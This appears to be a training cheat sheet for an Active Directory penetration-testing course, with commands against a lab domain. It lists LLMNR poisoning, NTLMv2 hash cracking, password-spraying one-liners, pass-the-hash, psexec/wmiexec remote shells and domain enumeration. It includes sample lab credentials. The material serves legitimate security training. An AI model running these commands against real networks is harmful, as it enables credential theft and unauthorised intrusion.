| Command | Description |
|---|---|
nslookup ns1.inlanefreight.com |
Used to query the domain name system and discover the IP address to domain name mapping of the target entered from a Linux-based host. |
sudo tcpdump -i ens224 |
Used to start capturing network packets on the network interface proceeding the -i option a Linux-based host. |
sudo responder -I ens224 -A |
Used to start responding to & analyzing LLMNR, NBT-NS and MDNS queries on the interface specified proceeding the-I option and operating in Passive Analysis mode which is activated using -A. Performed from a Linux-based host |
fping -asgq 172.16.5.0/23 |
Performs a ping sweep on the specified network segment from a Linux-based host. |
sudo nmap -v -A -iL hosts.txt -oN /home/User/Documents/host-enum |
Performs an nmap scan that with OS detection, version detection, script scanning, and traceroute enabled (-A) based on a list of hosts (hosts.txt) specified in the file proceeding -iL. Then outputs the scan results to the file specified after the -oNoption. Performed from a Linux-based host |
sudo git clone <https://github.com/ropnop/kerbrute.git> |
Uses git to clone the kerbrute tool from a Linux-based host. |
make help |
Used to list compiling options that are possible with make from a Linux-based host. |
sudo make all |
Used to compile a Kerbrute binary for multiple OS platforms and CPU architectures. |
./kerbrute_linux_amd64 |
Used to test the chosen complied Kebrute binary from a Linux-based host. |
sudo mv kerbrute_linux_amd64 /usr/local/bin/kerbrute |
Used to move the Kerbrute binary to a directory can be set to be in a Linux user’s path. Making it easier to use the tool. |
./kerbrute_linux_amd64 userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o kerb-results |
Runs the Kerbrute tool to discover usernames in the domain (INLANEFREIGHT.LOCAL) specified proceeding the -d option and the associated domain controller specified proceeding --dcusing a wordlist and outputs (-o) the results to a specified file. Performed from a Linux-based host. |
| Command | Description |
|---|---|
responder -h |
Used to display the usage instructions and various options available in Responder from a Linux-based host. |
hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt |
Uses hashcat to crack NTLMv2 (-m) hashes that were captured by responder and saved in a file (frond_ntlmv2). The cracking is done based on a specified wordlist. |
Import-Module .\\Inveigh.ps1 |
Using the Import-Module PowerShell cmd-let to import the Windows-based tool Inveigh.ps1. |
(Get-Command Invoke-Inveigh).Parameters |
Used to output many of the options & functionality available with Invoke-Inveigh. Peformed from a Windows-based host. |
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y |
Starts Inveigh on a Windows-based host with LLMNR & NBNS spoofing enabled and outputs the results to a file. |
.\\Inveigh.exe |
Starts the C# implementation of Inveigh from a Windows-based host. |
$regkey = "HKLM:SYSTEM\\CurrentControlSet\\services\\NetBT\\Parameters\\Interfaces" Get-ChildItem $regkey \|foreach { Set-ItemProperty -Path "$regkey\\$($_.pschildname)" -Name NetbiosOptions -Value 2 -Verbose} |
PowerShell script used to disable NBT-NS on a Windows host. |
| Command | Description |
|---|---|
#!/bin/bash for x in {{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}}{{A..Z},{0..9}} do echo $x; done |
Bash script used to generate 16,079,616 possible username combinations from a Linux-based host. |
crackmapexec smb 172.16.5.5 -u avazquez -p Password123 --pass-pol |
Uses CrackMapExecand valid credentials (avazquez:Password123) to enumerate the password policy (--pass-pol) from a Linux-based host. |
rpcclient -U "" -N 172.16.5.5 |
Uses rpcclient to discover information about the domain through SMB NULL sessions. Performed from a Linux-based host. |
rpcclient $> querydominfo |
Uses rpcclient to enumerate the password policy in a target Windows domain from a Linux-based host. |
enum4linux -P 172.16.5.5 |
Uses enum4linux to enumerate the password policy (-P) in a target Windows domain from a Linux-based host. |
enum4linux-ng -P 172.16.5.5 -oA ilfreight |
Uses enum4linux-ng to enumerate the password policy (-P) in a target Windows domain from a Linux-based host, then presents the output in YAML & JSON saved in a file proceeding the -oA option. |
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" \| grep -m 1 -B 10 pwdHistoryLength |
Uses ldapsearch to enumerate the password policy in a target Windows domain from a Linux-based host. |
net accounts |
Used to enumerate the password policy in a Windows domain from a Windows-based host. |
Import-Module .\\PowerView.ps1 |
Uses the Import-Module cmd-let to import the PowerView.ps1 tool from a Windows-based host. |
Get-DomainPolicy |
Used to enumerate the password policy in a target Windows domain from a Windows-based host. |
enum4linux -U 172.16.5.5 \| grep "user:" \| cut -f2 -d"[" \| cut -f1 -d"]" |
Uses enum4linux to discover user accounts in a target Windows domain, then leverages grep to filter the output to just display the user from a Linux-based host. |
rpcclient -U "" -N 172.16.5.5 rpcclient $> enumdomuser |
Uses rpcclient to discover user accounts in a target Windows domain from a Linux-based host. |
crackmapexec smb 172.16.5.5 --users |
Uses CrackMapExec to discover users (--users) in a target Windows domain from a Linux-based host. |
ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))" \| grep sAMAccountName: \| cut -f2 -d" " |
Uses ldapsearch to discover users in a target Windows doman, then filters the output using grep to show only the sAMAccountName from a Linux-based host. |
./windapsearch.py --dc-ip 172.16.5.5 -u "" -U |
Uses the python tool windapsearch.py to discover users in a target Windows domain from a Linux-based host. |
for u in $(cat valid_users.txt);do rpcclient -U "$u%Welcome1" -c "getusername;quit" 172.16.5.5 \| grep Authority; done |
Bash one-liner used to perform a password spraying attack using rpcclient and a list of users (valid_users.txt) from a Linux-based host. It also filters out failed attempts to make the output cleaner. |
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt Welcome1 |
Uses kerbrute and a list of users (valid_users.txt) to perform a password spraying attack against a target Windows domain from a Linux-based host. |
sudo crackmapexec smb 172.16.5.5 -u valid_users.txt -p Password123 \| grep + |
Uses CrackMapExec and a list of users (valid_users.txt) to perform a password spraying attack against a target Windows domain from a Linux-based host. It also filters out logon failures using grep. |
sudo crackmapexec smb 172.16.5.5 -u avazquez -p Password123 |
Uses CrackMapExec to validate a set of credentials from a Linux-based host. |
sudo crackmapexec smb --local-auth 172.16.5.0/24 -u administrator -H 88ad09182de639ccc6579eb0849751cf \| grep + |
Uses CrackMapExec and the --local-auth flag to ensure only one login attempt is performed from a Linux-based host. This is to ensure accounts are not locked out by enforced password policies. It also filters out logon failures using grep. |
Import-Module .\\DomainPasswordSpray.ps1 |
Used to import the PowerShell-based tool DomainPasswordSpray.ps1 from a Windows-based host. |
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue |
Performs a password spraying attack and outputs (-OutFile) the results to a specified file (spray_success) from a Windows-based host. |
| Command | Description |
|---|---|
Get-MpComputerStatus |
PowerShell cmd-let used to check the status of Windows Defender Anti-Virus from a Windows-based host. |
Get-AppLockerPolicy -Effective \| select -ExpandProperty RuleCollections |
PowerShell cmd-let used to view AppLocker policies from a Windows-based host. |
$ExecutionContext.SessionState.LanguageMode |
PowerShell script used to discover the PowerShell Language Mode being used on a Windows-based host. Performed from a Windows-based host. |
Find-LAPSDelegatedGroups |
A LAPSToolkit function that discovers LAPS Delegated Groups from a Windows-based host. |
Find-AdmPwdExtendedRights |
A LAPSTookit function that checks the rights on each computer with LAPS enabled for any groups with read access and users with All Extended Rights. Performed from a Windows-based host. |
Get-LAPSComputers |
A LAPSToolkit function that searches for computers that have LAPS enabled, discover password expiration and can discover randomized passwords. Performed from a Windows-based host. |
| Command | Description |
|---|---|
xfreerdp /u:[email protected] /p:Klmcargo2 /v:172.16.5.25 |
Connects to a Windows target using valid credentials. Performed from a Linux-based host. |
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users |
Authenticates with a Windows target over smb using valid credentials and attempts to discover more users (--users) in a target Windows domain. Performed from a Linux-based host. |
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups |
Authenticates with a Windows target over smb using valid credentials and attempts to discover groups (--groups) in a target Windows domain. Performed from a Linux-based host. |
sudo crackmapexec smb 172.16.5.125 -u forend -p Klmcargo2 --loggedon-users |
Authenticates with a Windows target over smb using valid credentials and attempts to check for a list of logged on users (--loggedon-users) on the target Windows host. Performed from a Linux-based host. |
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares |
Authenticates with a Windows target over smb using valid credentials and attempts to discover any smb shares (--shares). Performed from a Linux-based host. |
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share Dev-share |
Authenticates with a Windows target over smb using valid credentials and utilizes the CrackMapExec module (-M) spider_plus to go through each readable share (Dev-share) and list all readable files. The results are outputted in JSON. Performed from a Linux-based host. |
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 |
Enumerates the target Windows domain using valid credentials and lists shares & permissions available on each within the context of the valid credentials used and the target Windows host (-H). Performed from a Linux-based host. |
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5 -R SYSVOL --dir-only |
Enumerates the target Windows domain using valid credentials and performs a recursive listing (-R) of the specified share (SYSVOL) and only outputs a list of directories (--dir-only) in the share. Performed from a Linux-based host. |
rpcclient $> queryuser 0x457 |
Enumerates a target user account in a Windows domain using its relative identifier (0x457). Performed from a Linux-based host. |
rpcclient $> enumdomusers |
Discovers user accounts in a target Windows domain and their associated relative identifiers (rid). Performed from a Linux-based host. |
psexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.125 |
Impacket tool used to connect to the CLI of a Windows target via the ADMIN$ administrative share with valid credentials. Performed from a Linux-based host. |
wmiexec.py inlanefreight.local/wley:'transporter@4'@172.16.5.5 |
Impacket tool used to connect to the CLI of a Windows target via WMI with valid credentials. Performed from a Linux-based host. |
windapsearch.py -h |
Used to display the options and functionality of windapsearch.py. Performed from a Linux-based host. |
python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\\wley -p Klmcargo2 --da |
Used to enumerate the domain admins group (--da) using a valid set of credentials on a target Windows domain. Performed from a Linux-based host. |
python3 windapsearch.py --dc-ip 172.16.5.5 -u inlanefreight\\wley -p Klmcargo2 -PU |
Used to perform a recursive search (-PU) for users with nested permissions using valid credentials. Performed from a Linux-based host. |
sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all |
Executes the python implementation of BloodHound (bloodhound.py) with valid credentials and specifies a name server (-ns) and target Windows domain (inlanefreight.local) as well as runs all checks (-c all). Runs using valid credentials. Performed from a Linux-based host. |
| Command | Description |
|---|---|
Get-Module |
PowerShell cmd-let used to list all available modules, their version and command options from a Windows-based host. |
Import-Module ActiveDirectory |
Loads the Active Directory PowerShell module from a Windows-based host. |
Get-ADDomain |
PowerShell cmd-let used to gather Windows domain information from a Windows-based host. |
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName |
PowerShell cmd-let used to enumerate user accounts on a target Windows domain and filter by ServicePrincipalName. Performed from a Windows-based host. |
Get-ADTrust -Filter * |
PowerShell cmd-let used to enumerate any trust relationships in a target Windows domain and filters by any (-Filter *). Performed from a Windows-based host. |
Get-ADGroup -Filter * \| select name |
PowerShell cmd-let used to enumerate groups in a target Windows domain and filters by the name of the group (select name). Performed from a Windows-based host. |
Get-ADGroup -Identity "Backup Operators" |
PowerShell cmd-let used to search for a specifc group (-Identity "Backup Operators"). Performed from a Windows-based host. |
Get-ADGroupMember -Identity "Backup Operators" |
PowerShell cmd-let used to discover the members of a specific group (-Identity "Backup Operators"). Performed from a Windows-based host. |
Export-PowerViewCSV |
PowerView script used to append results to a CSV file. Performed from a Windows-based host. |
ConvertTo-SID |
PowerView script used to convert a User or Group name to it’s SID. Performed from a Windows-based host. |
Get-DomainSPNTicket |
PowerView script used to request the kerberos ticket for a specified service principal name (SPN). Performed from a Windows-based host. |
Get-Domain |
PowerView script used tol return the AD object for the current (or specified) domain. Performed from a Windows-based host. |
Get-DomainController |
PowerView script used to return a list of the target domain controllers for the specified target domain. Performed from a Windows-based host. |
Get-DomainUser |
PowerView script used to return all users or specific user objects in AD. Performed from a Windows-based host. |
Get-DomainComputer |
PowerView script used to return all computers or specific computer objects in AD. Performed from a Windows-based host. |
Get-DomainGroup |
PowerView script used to eturn all groups or specific group objects in AD. Performed from a Windows-based host. |
Get-DomainOU |
PowerView script used to search for all or specific OU objects in AD. Performed from a Windows-based host. |
Find-InterestingDomainAcl |
PowerView script used to find object ACLs in the domain with modification rights set to non-built in objects. Performed from a Windows-based host. |
Get-DomainGroupMember |
PowerView script used to return the members of a specific domain group. Performed from a Windows-based host. |
Get-DomainFileServer |
PowerView script used to return a list of servers likely functioning as file servers. Performed from a Windows-based host. |
Get-DomainDFSShare |
PowerView script used to return a list of all distributed file systems for the current (or specified) domain. Performed from a Windows-based host. |
Get-DomainGPO |
PowerView script used to return all GPOs or specific GPO objects in AD. Performed from a Windows-based host. |
Get-DomainPolicy |
PowerView script used to return the default domain policy or the domain controller policy for the current domain. Performed from a Windows-based host. |
Get-NetLocalGroup |
PowerView script used to enumerate local groups on a local or remote machine. Performed from a Windows-based host. |
| --- | --- |
| --- | --- |
| --- | --- |
| --- | --- |